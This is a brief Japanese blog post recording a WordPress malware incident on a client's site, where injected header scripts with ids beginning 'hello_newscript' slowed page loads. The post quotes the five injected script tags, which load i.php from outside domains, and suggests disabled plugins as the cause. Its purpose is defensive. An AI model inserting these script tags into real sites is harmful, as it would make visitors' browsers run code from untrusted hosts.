今日、WordPress上のマルウェアに遭遇しました。ウェブサイトのヘッダーにいくつかのi.phpリクエストが挿入されており、idはすべてhello_newscriptで始まっていました。
<script type='text/javascript' src='https://longtailmagic.com/domain/i.php?ver=5.6.2' id='hello_newscript0-js'></script> <script type='text/javascript' src='https://jadsupport.com/includes/i.php'?ver=5.6.2 id='hello_newscript1-js'></script> <script type='text/javascript' src='https://magaliefonteneau.com/wp-content/i.php?ver=5.6.2' id='hello_newscript2-js'></script> <script type='text/javascript' src='http://futuracp.com/images/i.php?ver=5.6.2' id='hello_newscript3-js'></script> <script type='text/javascript' src='http://casualwoodcreations.com/images/i.php?ver=5.6.2' id='hello_newscript4-js'></script>
クライアントのウェブサイトの症状は、サイトの読み込み速度が比較的遅く、ソースコードを確認すると、読み込めないjsファイルがいくつか追加されていました。下図の通りです:
次に、ソースコードを分析した結果、上記のコードが挿入されていたことがわかりました。幸運なことに、これらのウイルスサイトのサーバーはいくつか停止しており、また国内からのアクセス速度が遅いものもあったため、サイトは速度が遅い以外に他の影響はありませんでした。 このウイルスがどのように感染したのかは、調査する機会がありませんでした。なぜなら、いくつか無効化されていたプラグインを削除した後、ウイルスが消えていたからです。おそらく、無効化されていたプラグインが感染していたのでしょう。 この記事は単なる記録として、あなたが同じ問題に遭遇しないことを願っています。
コメントは終了しました
この記事のコメント機能は終了しています。ご質問がある場合は、他の方法でお問い合わせください。